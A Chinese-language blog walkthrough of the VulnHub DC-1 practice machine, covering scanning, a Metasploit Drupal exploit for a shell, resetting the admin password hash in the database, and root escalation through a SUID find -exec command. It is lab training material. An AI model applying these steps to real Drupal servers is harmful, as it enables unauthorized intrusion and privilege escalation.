渗透测试靶机 MMMystery-DC1

DC-1

Author:MMMystery
靶机下载: vulnhub-DC1

nmap -sT -sV -p- -T5 x.x.x.x

发现22和80端口
浏览器访问80端口,发现Drupal框架
搜索漏洞
在这里插入图片描述
尝试利用

use 4
set rhost x.x.x.x
run 

然后就进入了meterpreter
再输入python -c "import pty;pty.spawn('/bin/bash');"
就能拿到一个www的shell
在这里插入图片描述
进去之后查看文件发现数据库密码
在这里插入图片描述
进入数据库发现了users表的admin字段 密码是加密的在这里插入图片描述
drupal有自己的密码生成方式
直接利用网上现成的123456的hash值
在数据库里更新密码字段

update 表名 set 字段名 = 新内容 where 限定内容

再到web页面就能admin登录了
在后台看到了作者给出的提示:-exec
我们继续提权,先上传LinEnum

upload  LinEnum.sh  ./
chmod +x //增加执行权限

运行发现
在这里插入图片描述
ind命令是root权限的
那就直接查看root家目录吧

find /root

在这里插入图片描述

find /root/thefinalflag.txt -exec cat {} \;    

查找文件 -exec 执行后面的命令 {};
在这里插入图片描述
提权成功

DC1是我做的第一台靶机,还是在看着师傅们的wp下做的,到现在做到了第十台,也算是摸了个入门,回头看当时的记录,明显感觉是在瞎头乱撞,稍微重新整理了一下,截图没法补了,就补了一点过程,师傅们海涵。
欢迎师傅们指点
邮箱:xingg051@163.com

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值